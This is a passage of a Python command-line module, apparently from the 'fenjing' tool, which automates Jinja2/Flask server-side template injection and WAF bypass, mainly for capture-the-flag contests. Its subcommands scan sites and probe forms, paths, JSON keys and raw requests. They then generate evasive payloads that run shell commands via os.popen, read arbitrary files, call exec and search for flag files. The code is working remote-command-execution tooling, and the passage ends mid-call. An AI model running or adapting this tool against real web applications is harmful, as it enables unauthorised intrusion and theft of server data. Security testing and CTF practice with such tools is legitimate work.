            raise click.exceptions.BadParameter(
                f"{repr(value)} must be one of {[x.value for x in clazz]}",
                ctx=ctx,
                param=self,
            ) from exc
        return super().type_cast_value(ctx, value)


class RunFailed(Exception):
    """用于通知main和unit test运行失败的exception"""


def load_keywords_dotpy_safe(content: str) -> List[str]:
    """安全地从.py文件中读取关键字列表，不使用eval
    自动寻找文件中最长的列表表达式并读取

    Args:
        content (str): 文件内容

    Returns:
        List[str]: 关键字的列表
    """
    tree = ast.parse(content)
    list_nodes: List[ast.List] = [
        node for node in ast.walk(tree) if isinstance(node, ast.List)
    ]
    lists: List[List[str]] = [
        [
            item.value
            for item in node.elts
            if isinstance(item, ast.Constant) and isinstance(item.value, str)
        ]
        for node in list_nodes
    ]
    if not lists:
        raise ValueError("Can't find any list of string in the file")
    result = max(lists, key=len)
    if not result:
        logger.warning(
            "[red bold] Keyword list is empty. "
            "What kind of WAF are you want to bypass?",
            extra={"markup": True, "highlighter": None},
        )
        time.sleep(5)
        logger.info(
            "Anyway...",
            extra={"markup": True, "highlighter": None},
        )
        time.sleep(1)
    return result


def parse_getflag_info(html: str) -> Union[List[str], None]:
    flag_re = re.compile(rb"[a-zA-Z0-9-_]{1,10}\{\S{2,100}\}")
    result_b64 = re.search(r"start([a-zA-Z0-9+/=]+?)stop", html)
    if not result_b64:
        logger.warning("Getflag failed, we cannot find anything from this HTML...")
        print(html)
        return None
    try:
        result = base64.b64decode(result_b64.group(1))
        return [b.decode() for b in flag_re.findall(result)]
    except Exception:
        return None


def do_submit_cmdexec(
    cmd: str,
    submitter: Submitter,
    full_payload_gen_like: Union[FullPayloadGen, EvalArgsModePayloadGen],
) -> str:
    """使用FullPayloadGen生成shell命令payload, 然后使用submitter发送至对应服务器, 返回回显
    如果cmd以@开头，则将其作为fenjing内部命令解析

    内部命令如下：
    - get-config: 获得当前的config
    - eval: 让目标python进程执行eval，解析命令后面的部分

    Args:
        cmd (str): payload对应的命令
        submitter (Submitter): 实际发送请求的submitter
        full_payload_gen_like (Union[FullPayloadGen, EvalArgsModePayloadGen]):
            生成payload的FullPayloadGen

    Returns:
        str: 回显
    """
    payload, will_print = None, None
    is_getflag_requested = False  # 用户是否用@findflag一键梭flag
    # 解析命令
    if cmd[0] == "@":
        cmd = cmd[1:]
        if cmd.startswith("get-config"):
            payload, will_print = full_payload_gen_like.generate(CONFIG)
        elif cmd.startswith("findflag"):
            if not isinstance(submitter, ExtraParamAndDataCustomizable):
                logger.warning(
                    "@findflag is [red bold]not supported[/] for this",
                )
                return ""
            is_getflag_requested = True
            submitter.set_extra_param("eval_this", GETFLAG_CODE_EVAL)
            payload, will_print = full_payload_gen_like.generate(
                EVAL,
                (
                    ITEM,
                    (ATTRIBUTE, (FLASK_CONTEXT_VAR, "request"), "values"),
                    "eval_this",
                ),
            )
        elif cmd.startswith("eval"):
            payload, will_print = full_payload_gen_like.generate(
                EVAL, (STRING, cmd[4:].strip())
            )
        elif cmd.startswith("ls"):
            cmd = cmd.strip()
            if len(cmd) == 2:  # ls
                payload, will_print = full_payload_gen_like.generate(
                    EVAL, (STRING, "__import__('os').listdir()")
                )
            else:  # ls xxx
                payload, will_print = full_payload_gen_like.generate(
                    EVAL, (STRING, f"__import__('os').listdir({repr(cmd[2:].strip())})")
                )
        elif cmd.startswith("cat"):
            filepath = cmd[3:].strip()
            payload, will_print = full_payload_gen_like.generate(
                EVAL, (STRING, f"open({repr(filepath)}, 'r').read()")
            )
        elif cmd.startswith("exec"):
            statements = cmd[4:].strip()
            payload, will_print = full_payload_gen_like.generate(
                EVAL, (STRING, f"exec({repr(statements)})")
            )
        else:
            logger.info(
                "Please check your command",
                extra={"markup": False, "highlighter": None},
            )
            return ""
    else:
        payload, will_print = full_payload_gen_like.generate(OS_POPEN_READ, cmd)
    # 使用payload
    if payload is None:
        logger.warning(
            "[red]Failed[/] generating payload.",
        )
        if isinstance(submitter, ExtraParamAndDataCustomizable):
            submitter.unset_extra_param("eval_this")
        return ""
    logger.info(
        "Submit payload [blue]%s[/]",
        rich_escape(payload),
    )
    if not will_print:
        logger.warning(
            "Payload generator says that this payload "
            "[red]won't print[/] command execution result.",
        )
    result = submitter.submit(payload)
    assert result is not None
    if is_getflag_requested:
        flag_data = parse_getflag_info(result.text)
        if isinstance(submitter, ExtraParamAndDataCustomizable):
            submitter.unset_extra_param("eval_this")
        if flag_data:
            return pformat(flag_data).strip()
        return "GETFLAG_FAILED"
    return result.text


def parse_headers_cookies(headers_list: List[str], cookies: str) -> Dict[str, str]:
    """将headers列表和cookie字符串解析为可以传给requests的字典

    Args:
        headers_list (List[str]): headers列表，元素的格式为'Key: value'
        cookies (str): Cookie字符串

    Returns:
        Dict[str, str]: Headers字典
    """
    headers = {}
    if headers_list:
        for header in headers_list:
            key, _, value = header.partition(": ")
            if not key or not value:
                logger.warning(
                    "Failed parsing %s, ignored.",
                    repr(header),
                    extra={"highlighter": None},
                )
                continue
            if key.capitalize() != key:
                logger.warning(
                    "Header %s is not capitalized, fixed.",
                    key,
                    extra={"highlighter": None},
                )
                key = key.capitalize()
            headers[key] = value
    if cookies:
        headers["Cookie"] = cookies
    return headers


def is_form_has_response(
    url: str,
    form: Form,
    requester: HTTPRequester,
    tamper_cmd: Union[str, None],
) -> bool:
    """初步判断一个表单是否有可能可以SSTI的参数

    Args:
        url (str): 目标URL
        form (Form): 目标表单
        requester (HTTPRequester): 用于发送请求的requester
        options (Options): 有关攻击的各个选项
        tamper_cmd (Union[str, None]): 对payload进行修改的修改命令

    Returns:
        bool: 是否可能有SSTI的参数
    """
    if "127.0.0.1" in url or "localhost" in url:
        logger.info(
            "Try out our new feature [cyan bold]crack-keywords[/] with "
            '[cyan bold]python -m fenjing crack-keywords -k ./app.py -c "ls"[/]!',
            extra={"markup": True, "highlighter": None},
        )
    for input_field in form["inputs"]:
        submitter = FormSubmitter(
            url,
            form,
            input_field,
            requester,
        )
        if tamper_cmd:
            tamperer = shell_tamperer(tamper_cmd)
            submitter.add_tamperer(tamperer)

        marker = "".join(random.choices(string.ascii_lowercase, k=4))
        result1 = submitter.submit(marker)
        musterror_result = [
            submitter.submit(pattern + marker)
            for pattern in [
                "{{",
                "{%",
                "{#",
            ]
        ]
        if (
            result1 is not None
            and marker in result1.text
            and any(
                marker not in result.text
                for result in musterror_result
                if result is not None
            )
        ):
            return True

    return False


def do_crack_form_pre(
    url: str,
    form: Form,
    requester: HTTPRequester,
    options: Options,
    tamper_cmd: Union[str, None],
) -> Union[Tuple[FullPayloadGen, Submitter], None]:
    """攻击一个表单并获得用于生成payload的参数

    Args:
        url (str): 目标URL
        form (Form): 目标表单
        requester (HTTPRequester): 用于发送请求的requester
        options (Options): 有关攻击的各个选项
        tamper_cmd (Union[str, None]): 对payload进行修改的修改命令

    Returns:
        Union[Tuple[FullPayloadGen, Submitter], None]: 攻击结果
    """
    if "127.0.0.1" in url or "localhost" in url:
        logger.info(
            "Try out our new feature [cyan bold]crack-keywords[/] with "
            '[cyan bold]python -m fenjing crack-keywords -k ./app.py -c "ls"[/]!',
            extra={"markup": True, "highlighter": None},
        )
    python_version, python_subversion = (
        guess_python_version(url, requester)
        if options.python_version == PythonVersion.UNKNOWN
        else (options.python_version, None)
    )
    for input_field in form["inputs"]:
        submitter = FormSubmitter(
            url,
            form,
            input_field,
            requester,
        )
        environment = options.environment
        if options.environment == TemplateEnvironment.JINJA2:
            # we always doubt lol
            environment = (
                TemplateEnvironment.FLASK
                if guess_is_flask(submitter)
                else TemplateEnvironment.JINJA2
            )

        if tamper_cmd:
            tamperer = shell_tamperer(tamper_cmd)
            submitter.add_tamperer(tamperer)

        with pbar_manager.progress:
            cracker = Cracker(
                submitter=submitter,
                options=dataclasses.replace(
                    options,
                    python_version=python_version,
                    python_subversion=python_subversion,
                    environment=environment,
                ),
            )
            if not cracker.has_respond():
                logger.warning(
                    "input field [blue]%s[/] has no response",
                    rich_escape(repr(input_field)),
                    extra={"markup": True, "highlighter": None},
                )
                continue
            full_payload_gen = cracker.crack()
        if full_payload_gen:
            return full_payload_gen, submitter
    logger.warning(
        "[red]Didn't see any input that has response. "
        "Did you forget something like cookies?[/]",
        extra={"markup": True, "highlighter": None},
    )
    return None


def do_crack_form_eval_args_pre(
    url: str,
    form: Form,
    requester: HTTPRequester,
    options: Options,
    tamper_cmd: Union[str, None],
) -> Union[Tuple[Submitter, EvalArgsModePayloadGen], None]:
    """攻击一个表单并获得结果，但是将payload放在GET/POST参数中提交

    Args:
        url (str): 目标url
        form (Form): 目标表格
        requester (HTTPRequester): 提交请求的requester
        options (Options): 攻击使用的选项
        tamper_cmd (Union[str, None]): tamper命令

    Returns:
        Union[Tuple[Submitter, EvalArgsModePayloadGen], None]: 攻击结果
    """
    python_version, python_subversion = (
        guess_python_version(url, requester)
        if options.python_version == PythonVersion.UNKNOWN
        else (options.python_version, None)
    )
    for input_field in form["inputs"]:
        submitter = FormSubmitter(
            url,
            form,
            input_field,
            requester,
        )
        environment = options.environment
        if options.environment == TemplateEnvironment.JINJA2:
            # we always doubt lol
            environment = (
                TemplateEnvironment.FLASK
                if guess_is_flask(submitter)
                else TemplateEnvironment.JINJA2
            )

        if tamper_cmd:
            tamperer = shell_tamperer(tamper_cmd)
            submitter.add_tamperer(tamperer)
        with pbar_manager.progress:
            cracker = Cracker(
                submitter=submitter,
                options=dataclasses.replace(
                    options,
                    python_version=python_version,
                    python_subversion=python_subversion,
                    environment=environment,
                ),
            )
            if not cracker.has_respond():
                logger.warning(
                    "input field [blue]%s[/] has no response",
                    rich_escape(repr(input_field)),
                    extra={"markup": True, "highlighter": None},
                )
                continue
            result = cracker.crack_eval_args()
        if result:
            submitter2, evalargs_payload_gen = result
            return submitter2, evalargs_payload_gen
    logger.warning(
        "[red]Didn't see any input that has response. "
        "Did you forget something like cookies? [/]",
        extra={"markup": True, "highlighter": None},
    )
    return None


def do_crack_json_pre(
    url: str,
    method: str,
    json_data: str,
    key: str,
    requester: HTTPRequester,
    options: Options,
    tamper_cmd: Union[str, None],
) -> Union[Tuple[FullPayloadGen, Submitter], None]:
    """攻击一个表单并获得用于生成payload的参数

    Args:
        url (str): 目标URL
        form (Form): 目标表单
        requester (HTTPRequester): 用于发送请求的requester
        options (Options): 有关攻击的各个选项
        tamper_cmd (Union[str, None]): 对payload进行修改的修改命令

    Returns:
        Union[Tuple[FullPayloadGen, Submitter], None]: 攻击结果
    """
    python_version, python_subversion = (
        guess_python_version(url, requester)
        if options.python_version == PythonVersion.UNKNOWN
        else (options.python_version, None)
    )
    json_obj = json.loads(json_data)
    submitter = JsonSubmitter(
        url,
        method,
        json_obj,
        key,
        requester,
    )
    if tamper_cmd:
        tamperer = shell_tamperer(tamper_cmd)
        submitter.add_tamperer(tamperer)
    with pbar_manager.progress:
        if options.environment == TemplateEnvironment.JINJA2:
            # we always doubt lol
            environment = (
                TemplateEnvironment.FLASK
                if guess_is_flask(submitter)
                else TemplateEnvironment.JINJA2
            )
        else:
            environment = options.environment
        cracker = Cracker(
            submitter=submitter,
            options=dataclasses.replace(
                options,
                environment=environment,
                python_version=python_version,
                python_subversion=python_subversion,
            ),
        )
        if not cracker.has_respond():
            return None
        full_payload_gen = cracker.crack()
    if full_payload_gen:
        return full_payload_gen, submitter
    return None


def do_crack_path_pre(
    url: str,
    requester: HTTPRequester,
    options: Options,
    tamper_cmd: Union[str, None],
) -> Union[Tuple[FullPayloadGen, Submitter], None]:
    """攻击一个路径并获得payload生成器

    Args:
        url (str): 目标url
        requester (HTTPRequester): 发送请求的类
        options (Options): 攻击使用的选项
        tamper_cmd (Union[str, None]): tamper命令

    Returns:
        Union[Tuple[FullPayloadGen, Submitter], None]: 攻击结果
    """
    python_version, python_subversion = (
        guess_python_version(url, requester)
        if options.python_version == PythonVersion.UNKNOWN
        else (options.python_version, None)
    )
    submitter = PathSubmitter(url=url, requester=requester)
    if tamper_cmd:
        tamperer = shell_tamperer(tamper_cmd)
        submitter.add_tamperer(tamperer)
    with pbar_manager.progress:
        if options.environment == TemplateEnvironment.JINJA2:
            # we always doubt lol
            environment = (
                TemplateEnvironment.FLASK
                if guess_is_flask(submitter)
                else TemplateEnvironment.JINJA2
            )
        else:
            environment = options.environment
        cracker = Cracker(
            submitter=submitter,
            options=dataclasses.replace(
                options,
                environment=environment,
                python_version=python_version,
                python_subversion=python_subversion,
            ),
        )
        if not cracker.has_respond():
            return None
        full_payload_gen = cracker.crack()
    if full_payload_gen is None:
        return None
    return full_payload_gen, submitter


def do_crack_request_pre(
    submitter: TCPSubmitter,
    options: Options,
) -> Union[FullPayloadGen, None]:
    """根据指定的请求文件进行攻击并获得结果

    Args:
        submitter (TCPSubmitter): 发送payload的类
        options (Options): 攻击使用的选项

    Returns:
        Union[FullPayloadGen, None]: 攻击结果
    """
    with pbar_manager.progress:
        cracker = Cracker(submitter=submitter, options=options)
        if not cracker.has_respond():
            return None
        full_payload_gen = cracker.crack()
    if full_payload_gen is None:
        return None
    return full_payload_gen


def do_crack(
    full_payload_gen: FullPayloadGen,
    submitter: Submitter,
    exec_cmd: Union[str, None],
    find_flag: FindFlag,
):
    """使用payload生成器攻击对应的表单参数/路径

    Args:
        full_payload_gen (FullPayloadGen): payload生成器
        submitter (Submitter): payload提交器，用于提交payload到特定的表单/路径
        exec_cmd (Union[str, None]): 需要执行的命令
    """
    cmd_exec_func = partial(
        do_submit_cmdexec,
        submitter=submitter,
        full_payload_gen_like=full_payload_gen,
    )
    is_find_flag_enabled = find_flag == FindFlag.ENABLED
    if find_flag == FindFlag.AUTO:
        test_string = repr('"generate_me": os.popen("cat /f* ./f*").read(),')
        payload, will_print = full_payload_gen.generate(STRING, test_string)
        if payload is None or not will_print:
            is_find_flag_enabled = False
        elif len(payload) >= len(test_string) * 5:
            logger.info(
                "[yellow]Payload for finding flag "
                "is too long, we decide not to submit it[/]",
            )
            is_find_flag_enabled = False
        else:
            is_find_flag_enabled = True

    if isinstance(submitter, ExtraParamAndDataCustomizable) and is_find_flag_enabled:
        logger.info(
            "[yellow]Searching flags...[/]",
        )
        getflag_result = cmd_exec_func("@findflag")
        if getflag_result and getflag_result != "GETFLAG_FAILED":
            logger.info("This might be your [cyan bold]flag[/]:")
            logger.info(getflag_result)
            logger.info("No thanks.")
            time.sleep(3)
        else:
            logger.info("I cannot find flag for you... but")
            logger.info("Bypass WAF [green bold]success[/]")

    if exec_cmd:
        result = cmd_exec_func(exec_cmd)
        print(result)
        if any(keyword in result for keyword in RENDER_ERROR_KEYWORDS):
            raise RunFailed()
    else:
        interact(cmd_exec_func)


def do_crack_eval_args(
    submitter: Submitter,
    eval_args_payloadgen: EvalArgsModePayloadGen,
    exec_cmd: Union[str, None],
    find_flag: FindFlag
):
    """攻击对应的表单参数/路径，但是使用eval_args方法

    Args:
        submitter (Submitter): payload提交器，用于提交payload到特定的表单/路径
        eval_args_payloadgen (EvalArgsModePayloadGen): EvalArgs的payload生成器
        exec_cmd (Union[str, None]): 需要执行的命令
    """
    cmd_exec_func = partial(
        do_submit_cmdexec,
        submitter=submitter,
        full_payload_gen_like=eval_args_payloadgen,
    )
    if find_flag != FindFlag.DISABLED:
        print(cmd_exec_func("@findflag"))
    if exec_cmd:
        print(cmd_exec_func(exec_cmd))
    else:
        interact(cmd_exec_func)


common_options_cli = [
    click.option(
        "--exec-cmd",
        "-e",
        default="",
        help="成功后执行的shell指令，不填则成功后进入交互模式",
    ),
    click.option(
        "--detect-mode",
        type=DetectMode,
        cls=EnumOption,
        default=DetectMode.ACCURATE,
        help="分析模式，可为accurate或fast",
    ),
    click.option(
        "--replaced-keyword-strategy",
        default=ReplacedKeywordStrategy.AVOID,
        type=ReplacedKeywordStrategy,
        cls=EnumOption,
        help="WAF替换关键字时的策略，可为avoid/ignore/doubletapping",
    ),
    click.option(
        "--environment",
        default=TemplateEnvironment.JINJA2,
        type=TemplateEnvironment,
        cls=EnumOption,
        help="模板的执行环境，默认为不带flask全局变量的普通jinja2",
    ),
    click.option(
        "--detect-waf-keywords",
        type=DetectWafKeywords,
        cls=EnumOption,
        default=DetectWafKeywords.NONE,
        help="是否枚举被waf的关键字，需要额外时间，默认为none, 可选full/fast",
    ),
    click.option(
        "--find-flag",
        type=FindFlag,
        cls=EnumOption,
        default=FindFlag.AUTO,
        help="是否自动寻找flag，默认只在WAF较好绕过时自动寻找flag",
    ),
    click.option(
        "--waf-keyword",
        default=[],
        multiple=True,
        help="手动指定waf页面含有的关键字，此时不会自动检测waf页面的哈希等。可指定多个关键字",
    ),
    click.option(
        "--tamper-cmd",
        default="",
        help="在发送payload之前进行编码的命令，默认不进行额外操作",
    ),
    click.option("--interval", default=0.0, help="每次请求的间隔"),
]

common_options_http = [
    click.option("--url", "-u", required=True, help="需要攻击的URL"),
    click.option(
        "--user-agent", default=DEFAULT_USER_AGENT, help="请求时使用的User Agent"
    ),
    click.option("--header", default=[], multiple=True, help="请求时使用的Headers"),
    click.option("--cookies", default="", help="请求时使用的Cookie"),
    click.option("--extra-params", default=None, help="请求时的额外GET参数，如a=1&b=2"),
    click.option("--extra-data", default=None, help="请求时的额外POST参数，如a=1&b=2"),
    click.option("--proxy", default="", help="请求时使用的代理"),
    click.option("--no-verify-ssl", default=False, is_flag=True, help="不验证SSL证书"),
]


def add_options(options):
    """应用列表中的click option装饰器"""

    def decorator(f):
        for option in options:
            f = option(f)
        return f

    return decorator


@click.group()
@click.option("--silent", "--shutup", is_flag=True, default=False, help="不打印INFO等")
def main(silent):
    """click的命令组"""
    if not silent:
        console.print(f"[yellow bold]{rich_escape(TITLE)}[/]")
    logging.basicConfig(
        level=logging.INFO if not silent else logging.ERROR,
        format=LOGGING_FORMAT,
        datefmt="[%X]",
        handlers=[
            RichHandler(
                show_level=False,
                console=console,
                markup=True,
                show_time=False,
                show_path=False,
                keywords=[],
            )
        ],
    )


@main.command()
@add_options(common_options_http)
@add_options(common_options_cli)
@click.option(
    "--action",
    "-a",
    default=None,
    help="参数的提交路径，如果和URL中的路径不同则需要填入",
)
@click.option("--method", "-m", default="POST", help="参数的提交方式，默认为POST")
@click.option("--inputs", "-i", required=True, help="所有参数，以逗号分隔")
@click.option(
    "--eval-args-payload",
    default=False,
    is_flag=True,
    help="是否开启在GET参数中传递Eval payload的功能",
)
def crack(
    url: str,
    action: str,
    method: str,
    inputs: str,
    exec_cmd: str,
    interval: float,
    detect_mode: DetectMode,
    replaced_keyword_strategy: ReplacedKeywordStrategy,
    environment: TemplateEnvironment,
    detect_waf_keywords: DetectWafKeywords,
    find_flag: FindFlag,
    waf_keyword: List[str],
    eval_args_payload: bool,
    user_agent: str,
    header: tuple,
    cookies: str,
    extra_params: str,
    extra_data: str,
    proxy: str,
    no_verify_ssl: bool,
    tamper_cmd: str,
):
    """
    攻击指定的表单
    """

    assert all(param is not None for param in [url, inputs]), "Please check your param"
    form = get_form(
        action=action or urlparse(url).path,
        method=method,
        inputs=inputs.split(","),
    )
    requester = HTTPRequester(
        interval=interval,
        user_agent=user_agent,
        headers=parse_headers_cookies(headers_list=list(header), cookies=cookies),
        extra_params_querystr=extra_params,
        extra_data_querystr=extra_data,
        proxy=proxy,
        no_verify_ssl=no_verify_ssl,
    )
    if not eval_args_payload:
        result = do_crack_form_pre(
            url,
            form,
            requester,
            Options(
                detect_mode=detect_mode,
                replaced_keyword_strategy=replaced_keyword_strategy,
                environment=environment,
                detect_waf_keywords=detect_waf_keywords,
                waf_keywords=waf_keyword,
            ),
            tamper_cmd,
        )
        if not result:
            logger.warning("Test form failed...", extra={"highlighter": None})
            raise RunFailed()
        full_payload_gen, submitter = result
        do_crack(full_payload_gen, submitter, exec_cmd, find_flag)
    else:
        # pylance is not happy about using same variable name
        # that's why we use result'2' here.
        result2 = do_crack_form_eval_args_pre(
            url,
            form,
            requester,
            Options(
                detect_mode=detect_mode,
                replaced_keyword_strategy=replaced_keyword_strategy,
                environment=environment,
                detect_waf_keywords=detect_waf_keywords,
                waf_keywords=waf_keyword,
            ),
            tamper_cmd,
        )
        if not result2:
            logger.warning("Test form failed...", extra={"highlighter": None})
            raise RunFailed()
        submitter, evalargs_payload_gen = result2
        do_crack_eval_args(submitter, evalargs_payload_gen, exec_cmd, find_flag)


@main.command()
@add_options(common_options_http)
@add_options(common_options_cli)
def crack_path(
    url: str,
    exec_cmd: str,
    interval: float,
    detect_mode: DetectMode,
    replaced_keyword_strategy: ReplacedKeywordStrategy,
    environment: TemplateEnvironment,
    detect_waf_keywords: DetectWafKeywords,
    find_flag: FindFlag,
    waf_keyword: List[str],
    user_agent: str,
    header: tuple,
    cookies: str,
    extra_params: str,
    extra_data: str,
    proxy: str,
    no_verify_ssl: bool,
    tamper_cmd: str,
):
    """
    攻击指定的路径
    """
    assert url is not None, "Please provide URL!"

    requester = HTTPRequester(
        interval=interval,
        user_agent=user_agent,
        headers=parse_headers_cookies(headers_list=list(header), cookies=cookies),
        extra_params_querystr=extra_params,
        extra_data_querystr=extra_data,
        proxy=proxy,
        no_verify_ssl=no_verify_ssl,
    )
    result = do_crack_path_pre(
        url,
        requester,
        Options(
            detect_mode=detect_mode,
            replaced_keyword_strategy=replaced_keyword_strategy,
            environment=environment,
            detect_waf_keywords=detect_waf_keywords,
            waf_keywords=waf_keyword,
        ),
        tamper_cmd,
    )
    if not result:
        logger.warning("Test form failed...", extra={"highlighter": None})
        raise RunFailed()
    full_payload_gen, submitter = result
    do_crack(full_payload_gen, submitter, exec_cmd, find_flag)


@main.command()
@add_options(common_options_http)
@add_options(common_options_cli)
@click.option("--method", "-m", default="POST", help="JSON的提交方式，默认为POST")
@click.option("--json-data", required=True, help="json数据")
@click.option("--key", required=True, help="攻击的键")
def crack_json(
    url: str,
    method: str,
    json_data: str,
    key: str,
    exec_cmd: str,
    interval: float,
    detect_mode: DetectMode,
    replaced_keyword_strategy: ReplacedKeywordStrategy,
    environment: TemplateEnvironment,
    detect_waf_keywords: DetectWafKeywords,
    find_flag: FindFlag,
    waf_keyword: List[str],
    user_agent: str,
    header: tuple,
    cookies: str,
    extra_params: str,
    extra_data: str,
    proxy: str,
    no_verify_ssl: bool,
    tamper_cmd: str,
):
    """
    攻击指定的JSON API
    """

    assert url is not None, "Please check your param"
    requester = HTTPRequester(
        interval=interval,
        user_agent=user_agent,
        headers=parse_headers_cookies(headers_list=list(header), cookies=cookies),
        extra_params_querystr=extra_params,
        extra_data_querystr=extra_data,
        proxy=proxy,
        no_verify_ssl=no_verify_ssl,
    )
    result = do_crack_json_pre(
        url,
        method,
        json_data,
        key,
        requester,
        Options(
            detect_mode=detect_mode,
            replaced_keyword_strategy=replaced_keyword_strategy,
            environment=environment,
            detect_waf_keywords=detect_waf_keywords,
            waf_keywords=waf_keyword,
        ),
        tamper_cmd,
    )
    if not result:
        logger.warning("Test form failed...", extra={"highlighter": None})
        raise RunFailed()
    full_payload_gen, submitter = result
    do_crack(full_payload_gen, submitter, exec_cmd, find_flag)


@main.command()
@add_options(common_options_http)
@add_options(common_options_cli)
def scan(
    url: str,
    exec_cmd: str,
    interval: float,
    detect_mode: DetectMode,
    replaced_keyword_strategy: ReplacedKeywordStrategy,
    environment: TemplateEnvironment,
    detect_waf_keywords: DetectWafKeywords,
    find_flag: FindFlag,
    waf_keyword: List[str],
    user_agent: str,
    header: tuple,
    cookies: str,
    extra_params: str,
    extra_data: str,
    proxy: str,
    no_verify_ssl: bool,
    tamper_cmd: str,
):
    """
    扫描指定的网站
    """

    requester = HTTPRequester(
        interval=interval,
        user_agent=user_agent,
        headers=parse_headers_cookies(headers_list=list(header), cookies=cookies),
        extra_params_querystr=extra_params,
        extra_data_querystr=extra_data,
        proxy=proxy,
        no_verify_ssl=no_verify_ssl,
    )
    options = Options(
        detect_mode=detect_mode,
        replaced_keyword_strategy=replaced_keyword_strategy,
        environment=environment,
        detect_waf_keywords=detect_waf_keywords,
        waf_keywords=waf_keyword,
    )
    url_forms = [
        (page_url, form)
        for i, (page_url, forms) in enumerate(yield_form(requester, url))
        for form in forms
        if i < 100
    ]

    url_forms.sort(
        key=(
            lambda item: is_form_has_response(
                url=item[0], form=item[1], requester=requester, tamper_cmd=tamper_cmd
            )
        ),
        reverse=True,
    )

    for page_url, form in url_forms:
        logger.warning("Scan form: %s", repr(form), extra={"highlighter": None})
        result = do_crack_form_pre(
            page_url,
            form,
            requester,
            options,
            tamper_cmd,
        )
        if not result:
            continue
        full_payload_gen, submitter = result
        do_crack(full_payload_gen, submitter, exec_cmd, find_flag)
        return
    logger.warning("Scan failed...", extra={"highlighter": None})
    logger.warning(
        "Try to pass params manualy: "
        + "python -m fenjing crack %s --inputs aaa,bbb --method GET",
        url,
        extra={"highlighter": None},
    )

    raise RunFailed()


@main.command()
@add_options(common_options_cli)
@click.option("--host", "-h", required=True, help="目标的host，可为IP或域名")
@click.option("--port", "-p", required=True, type=int, help="目标的端口")
@click.option(
    "--request-file",
    "-f",
    required=True,
    help="保存在文本文件中的请求，其中payload处为PAYLOAD",
)
@click.option(
    "--toreplace", default=b"PAYLOAD", type=bytes, help="请求文件中payload的占位符"
)
@click.option("--ssl/--no-ssl", default=False, help="是否使用SSL")
@click.option("--urlencode-payload", default=True, help="是否对payload进行urlencode")
@click.option("--raw", is_flag=True, default=False, help="不检查请求的换行符等")
@click.option("--retry-times", default=5, help="重试次数")
@click.option("--update-content-length", default=True, help="自动更新Content-Length")
def crack_request(
    host: str,
    port: int,
    request_file: str,
    toreplace: bytes,
    ssl: bool,
    exec_cmd: str,
    urlencode_payload: bool,
    raw: bool,
    detect_mode: DetectMode,
    replaced_keyword_strategy: ReplacedKeywordStrategy,
    environment: TemplateEnvironment,
    detect_waf_keywords: DetectWafKeywords,
    find_flag: FindFlag,
    waf_keyword: List[str],
    retry_times: int,
    interval: float,
    tamper_cmd: str,
    update_content_length: bool,
):
    """
    从文本文件中读取请求并攻击目标，文本文件中用`PAYLOAD`标记payload插入位置
    """
    request_filepath = Path(request_file)
    if not request_filepath.is_file():
        logger.error("File doesn't exist: %s", request_filepath)
    request_pattern = request_filepath.read_bytes()
    if not raw and not check_tail(request_pattern):
        logger.warning(
            "Request doesn't ends with '\\r\\n\\r\\n', fixing...",
            extra={"highlighter": None},
        )
        logger.warning(
            "You can use `--raw` flag to disable this", extra={"highlighter": None}
        )
        request_pattern = fix_tail(request_pattern)
        time.sleep(2)
    if not raw and not check_line_break(request_pattern):
        logger.warning(
            "Request's linebreak is not '\\r\\n', fixing...",
            extra={"highlighter": None},
        )
        logger.warning(
            "You can use `--raw` flag to disable this", extra={"highlighter": None}
        )
        request_pattern = fix_line_break(request_pattern)
        time.sleep(2)

    requester = TCPRequester(
        host=host, port=port, use_ssl=ssl, retry_times=retry_times, interval=interval
    )
    submitter = TCPSubmitter(
        requester=requester,
        pattern=request_pattern,
        toreplace=toreplace,
        urlencode_payload=urlencode_payload,
        enable_update_content_length=update_content_length,
    )
    if tamper_cmd:
        tamperer = shell_tamperer(tamper_cmd)
        submitter.add_tamperer(tamperer)
    full_payload_gen = do_crack_request_pre(
        submitter=submitter,
        options=Options(
            detect_mode=detect_mode,
            replaced_keyword_strategy=replaced_keyword_strategy,
            environment=environment,
            detect_waf_keywords=detect_waf_keywords,
            waf_keywords=waf_keyword,
        ),
    )
    if not full_payload_gen:
        logger.warning("Crack request failed...", extra={"highlighter": None})
        raise RunFailed()
    do_crack(full_payload_gen, submitter, exec_cmd, find_flag)


@main.command()
@click.option(
    "--keywords-file",
    "-k",
    required=True,
    help="保存着所有关键字的文件，可为.txt, .py或.json",
)
@click.option(
    "--output-file",
    "-o",
    default="",
    help="输出文件，后缀名一般为.jinja2，不填则直接print",
)
@click.option(
    "--command",
    "-c",
    required=True,
    help="需要执行的shell指令",
)
@click.option(
    "--suffix",
    default="",
    help="手动指定关键字文件的后缀，默认按照文件原本的后缀名读取",
)
@click.option(
    "--detect-mode",
    type=DetectMode,
    cls=EnumOption,
    default=DetectMode.ACCURATE,
    help="分析模式，可为accurate或fast",
)
@click.option(
    "--replaced-keyword-strategy",
    default=ReplacedKeywordStrategy.AVOID,
    type=ReplacedKeywordStrategy,
    cls=EnumOption,
    help="WAF替换关键字时的策略，可为avoid/ignore/doubletapping",
)
@click.option(
    "--environment",
    default=TemplateEnvironment.JINJA2,
    type=TemplateEnvironment,
    cls=EnumOption,
    help="模板的执行环境，默认为不带flask全局变量的普通jinja2",
)
@click.option(
    "--python-version",
    default=PythonVersion.PYTHON3,
    type=PythonVersion,
    cls=EnumOption,
    help="目标的python版本为python2/python3，默认为python3",
)
@click.option(
    "--python-subversion",
    default=6,
    type=int,
    help="目标的python小版本，默认为6(python3.6)",
)
def crack_keywords(
    keywords_file: str,
    output_file: str,
    command: str,
    suffix: str,
    detect_mode: DetectMode,
    replaced_keyword_strategy: ReplacedKeywordStrategy,
    environment: TemplateEnvironment,
    python_version: PythonVersion,
    python_subversion: int,
):
    """根据关键字生成对应的payload"""
    keywords_path = Path(keywords_file)
    output_path = Path(output_file) if output_file else None
    if not keywords_path.exists():
        logger.error(
            "File [blue]%s[/] [red bold]Not Exists![/]",
            rich_escape(keywords_file),
            extra={"markup": True, "highlighter": None},
        )
        raise FileNotFoundError(keywords_file)
    if not suffix:
        suffix = keywords_path.suffix
    if suffix == ".json":
        waf_keywords: List = json.loads(keywords_path.read_text())
    elif suffix == ".py":
        try:
            waf_keywords: List = load_keywords_dotpy_safe(keywords_path.read_text())
        except SyntaxError as e:
            logger.error(
                "Syntax error, check your %s",
                keywords_file,
                extra={"highlighter": None},
            )
            raise e
    else:
        if suffix != ".txt":
            logger.warning("Unknown suffix %s, handle it as .txt", suffix)
        waf_keywords: List = keywords_path.read_text().strip().split("\n")
    logger.info(
        "Waf keywords are [blue]%s[/]",
